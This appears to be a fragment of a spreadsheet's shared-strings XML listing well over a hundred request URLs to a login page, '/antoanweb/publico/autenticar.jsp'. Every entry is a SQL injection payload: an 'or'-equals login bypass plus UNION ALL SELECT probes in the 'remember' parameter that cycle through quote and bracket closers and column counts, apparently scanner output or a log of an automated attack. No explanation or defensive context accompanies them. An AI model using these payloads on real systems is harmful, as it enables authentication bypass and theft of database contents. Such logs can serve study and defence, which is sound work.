    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372,6372#and(("zdrp"like"zdrp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566,9566#and(("cglr"like"cglr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701,5701#and(("hndr"like"hndr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111,9111#and(("mrww"like"mrww&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104#and(("oweu"like"oweu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421,421#and(("ychm"like"ychm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413,413#and(("llqr"like"llqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757,6757#and((("pmxv"like"pmxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557,4557#and((("yuha"like"yuha&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840,7840#and((("xzcg"like"xzcg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611#and((("pwaz"like"pwaz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388,5388#and((("dayd"like"dayd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686#and((("apcl"like"apcl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374,7374#and((("edia"like"edia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522,9522#and((("fkns"like"fkns&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708#and((("ayqg"like"ayqg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880,5880#and((("smbz"like"smbz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555,1555#and"nelo"like"nelo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116,116#and"tvoa"like"tvoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891,1891#and"gfaa"like"gfaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810,1810#and"zorm"like"zorm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985,7985#and"zfwn"like"zfwn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754,5754#and"rwvv"like"rwvv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696,9696#and"tosg"like"tosg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217#and"odev"like"odev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124,9124#and"twzo"like"twzo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144,3144#and"swmg"like"swmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull--and(8786=8786&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null--and(405=405&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null--and(8200=8200&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null--and(2874=2874&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null--and(3681=3681&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null--and(4883=4883&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null--and(587=587&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null--and(8349=8349&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null--and(1030=1030&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null--and(7810=7810&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull--and((4806=4806&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null--and((1852=1852&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null--and((7087=7087&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null--and((868=868&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null--and((4649=4649&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null--and((4248=4248&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null--and((988=988&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null--and((4989=4989&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null--and((4681=4681&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null--and((7672=7672&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull--and(((1675=1675&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null--and(((6869=6869&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null--and(((7579=7579&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null--and(((7367=7367&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null--and(((4619=4619&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null--and(((1017=1017&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null--and(((1033=1033&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null--and(((1792=1792&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null--and(((2440=2440&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null--and(((2520=2520&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull--and('kzmw'='kzmw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null--and('pqhw'='pqhw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null--and('qmlp'='qmlp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null--and('ljph'='ljph&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null--and('bdgi'='bdgi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null--and('nvzo'='nvzo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null--and('bqvu'='bqvu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null--and('yfvg'='yfvg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null--and('tngw'='tngw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null--and('pwpq'='pwpq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull--and(('okkk'='okkk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null--and(('ognv'='ognv&amp;modo=entrar</t>
  </si>
  <si>
